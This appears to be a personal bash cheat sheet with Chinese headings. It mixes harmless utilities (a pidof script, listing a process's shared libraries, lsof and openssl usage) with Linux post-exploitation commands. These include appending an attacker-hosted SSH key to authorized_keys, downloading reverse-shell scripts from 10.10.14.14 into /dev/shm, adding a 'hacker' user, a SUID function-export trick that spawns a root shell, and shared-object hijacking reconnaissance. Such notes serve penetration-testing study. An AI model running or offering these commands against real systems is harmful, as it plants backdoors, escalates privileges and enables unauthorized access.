bash 实现一些命令
pidof
#!/bin/sh
# 定义一个函数,参数为进程名
pidof_process() {
if [ $# -ne 1 ]; then
echo "Usage: pidof_process <process_name>"
return 1
fi
local process_name="$1"
local pids
# 使用 ps 命令查找指定进程名的 PID,并排除自身进程
pids=($(ps aux | grep "$process_name" | grep -v "grep" | grep -v "$0" | awk '{print $2}'))
if [ -n "$pids" ]; then
echo "$pids"
else
echo "Process $process_name not found."
fi
}
if [ $# -ne 1 ]; then
echo "Usage: pidof_process <process_name>"
fi
pidof_process $1
通过 pid 获取进程加载的动态库
#!/bin/bash
# 定义一个函数,参数为进程的 PID
list_shared_libraries() {
local pid="$1"
local maps_file="/proc/$pid/maps"
# 检查指定的 PID 是否存在
if [ ! -e "$maps_file" ]; then
echo "Process with PID $pid not found."
return 1
fi
# 使用 awk 解析 maps 文件,并打印包含 ".so" 的行的第6列,然后去重
local libraries
libraries=($(awk '/\.so/ {print $6}' "$maps_file" | sort -u))
# 输出数组的内容
for library in "${libraries[@]}"; do
echo "$library"
done
}
# 检查参数是否为空
if [ -z "$1" ]; then
echo "Usage: $0 <PID>"
exit 1
fi
# 调用函数并传递进程的 PID 作为参数,将结果捕获到变量
result=($(list_shared_libraries "$1"))
# 输出捕获到的结果数组
for library in "${result[@]}"; do
echo "$library"
done
安装公钥
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
下载文件到内存
#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
lsof
#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by networks processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80
useradd
useradd -p 'openssl passwd -1 <Password>' hacker
http server
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
openssl
# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz
sudo suid
sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service #Then, when you call the suid binary, this function will be executed
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
Shared Object Hijacking
# Lets find a SUID using a non-standard library
ldd some_suid
something.so => /lib/x86_64-linux-gnu/something.so
# The SUID also loads libraries from a custom location where we can write
readelf -d payroll | grep PATH
0x000000000000001d (RUNPATH) Library runpath: [/development]
gen passwd
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
Script/Binaries in PATH
for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done